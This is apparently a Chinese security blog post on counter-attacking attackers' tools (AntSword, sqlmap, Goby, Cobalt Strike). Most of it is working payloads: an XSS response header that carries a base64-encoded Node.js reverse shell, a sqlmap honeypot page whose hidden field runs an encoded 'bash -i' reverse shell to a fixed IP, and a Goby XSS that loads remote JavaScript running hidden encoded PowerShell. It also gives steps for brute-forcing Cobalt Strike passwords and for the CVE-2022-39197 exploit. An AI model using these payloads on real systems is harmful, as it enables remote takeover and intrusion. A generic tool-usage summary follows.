朔源反制-170-对抗上线CS,Goby,蚁剑,Sqlmap等安全工具

cs反制

红队在进行连接后门时候:

代码为一句话后门:<?php @eval($_POST[x];?>

修改为

<?php

header('HTTP/1.1 500 <img src=# οnerrοr=alert(1)>');

该字段意思为:当img src指向的图片不存在时会弹窗1

依据此 可进行蚁剑上线代码:

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

xx为监听的端口号 xx.xx.xx.xx为监听主机

两者组合编码后:

header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjQ3Ljk0LjIzNi4xMTciLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpO3NoLnN0ZGVyci5waXBlKGNsaWVudCk7fSk7`,`base64`).toString())'>");

最终 蓝队通过修改后门的代码实现获得蚁剑使用者的权限(主机权限)

sqlmap反制

构造一个页面 在含有注入点的时候,其中数据包含有反制的数据包:步骤为

命令管道符:ping "`dir`"

构造注入点页面固定注入参数值,等待攻击者进行注入

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"

将dir的参数换为 反弹shell的命令

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0</dev/tcp/47.94.236.117/2333 1>&0 2>&0`"

1、测试反弹编码:

bash -i >& /dev/tcp/47.94.236.117/2333 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==

echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i

2、蓝队构造页面test.php注入页面固定参数值:

<html>

<head>

<meta charset="utf-8">

<title> A sqlmap honeypot demo</title>

</head>

<body>

<input>search the user</input> <!--创建一个空白表单-->

<form action="username.html" method="post" enctype="text/plain">

<!--创建一个隐藏的表单-->

<input type='hidden' name='name' value="xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"/>

<!--创建一个按钮,提交表单内容-->

<input type="submit" value='提交'>

</form>

</body>

</html>

3、红队攻击者进行注入测试:

sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

即可中招

goby反制

构造页面中含有反制代码的js文件,

index页面

index.php

<?php

header("X-Powered-By: PHP/<img src=1 οnerrοr=import(unescape('http%3A//47.94.236.117/1.js'))>");

?>

<head>

<title>TEST</title>

</head>

<body>

testtest

</body>

</html>

js文件:此处换为Cs的powershell,红队在进行资产信息查看时,会触发反弹shell

(function(){

require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');

})();

cs反制

反制Server,爆破密码(通用)

针对没有采用隐匿C2地址的技术导致的反制(后门样本被溯源到C2地址)

项目地址https://github.com/ryanohoro/csbruter

python csbruter.py 47.94.236.117 pass.txt

利用漏洞(CVE-2022-39197)Cobalt Strike <=4.7 XSS

项目地址https://github.com/its-arun/CVE-2022-39197

条件:有木马样本

取得红队木马样本开始操作如下:

1、蓝队修改EXP里面的执行命令后编译,红队客户端所触发的东西在这里修改:如上线cs

步骤为:修改:EvilJar/src/main/java/Exploit.java

2、蓝队修改svg加载地址并架设Web服务(红队的CS服务器能访问的Web服务)

修改:evil.svg 指向url地址

python -m http.server 8888

3、蓝队执行EXP调用后门上线,攻击者进程查看时触发

python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Nmap、Sqlmap、Burpsuite是非常流行的安全测试工具,可以帮助安全测试人员检测网络和应用程序中的漏洞和安全问题。以下是这些工具的简要说明和使用方法: 1. Nmap:Nmap是一款网络探测和安全测试工具,可以用于扫描网络上的主机和端口,识别主机操作系统和服务,检测漏洞等。常用命令包括: - 扫描目标主机:nmap [target IP] - 扫描指定端口:nmap -p [port number] [target IP] - 扫描指定端口范围:nmap -p [start port]-[end port] [target IP] - 探测主机操作系统:nmap -O [target IP] - 探测服务版本:nmap -sV [target IP] 2. SqlmapSqlmap是一款自动化SQL注入工具,可以用于检测Web应用程序中的SQL注入漏洞。常用命令包括: - 检测SQL注入漏洞:sqlmap -u [target URL] - 指定数据库类型:sqlmap -u [target URL] --dbms=[database type] - 指定注入点参数:sqlmap -u [target URL] -p [parameter name] - 获取数据库信息:sqlmap -u [target URL] -D [database name] --tables - 获取表信息:sqlmap -u [target URL] -D [database name] -T [table name] --columns 3. Burpsuite:Burpsuite是一款用于拦截、修改和重发HTTP请求的代理工具,可以用于Web应用程序的安全测试。常用功能包括: - 拦截HTTP请求和响应:在Proxy -> Intercept页面启用拦截功能,可以手动拦截HTTP请求和响应,并对其进行修改和重发。 - 扫描Web应用程序:在Scanner -> Active Scan页面,可以对Web应用程序进行漏洞扫描,包括SQL注入、XSS等。 - 模拟攻击:在Intruder页面,可以模拟各种攻击,如密码猜测、文件包含、命令执行等。 - 破解会话:在Session Handling -> Session Management页面,可以对Web应用程序的会话进行管理和破解。 以上是这些工具的简要说明和使用方法,使用这些工具进行安全测试需要具备一定的技术水平和安全意识,建议在合法授权和合规的情况下进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值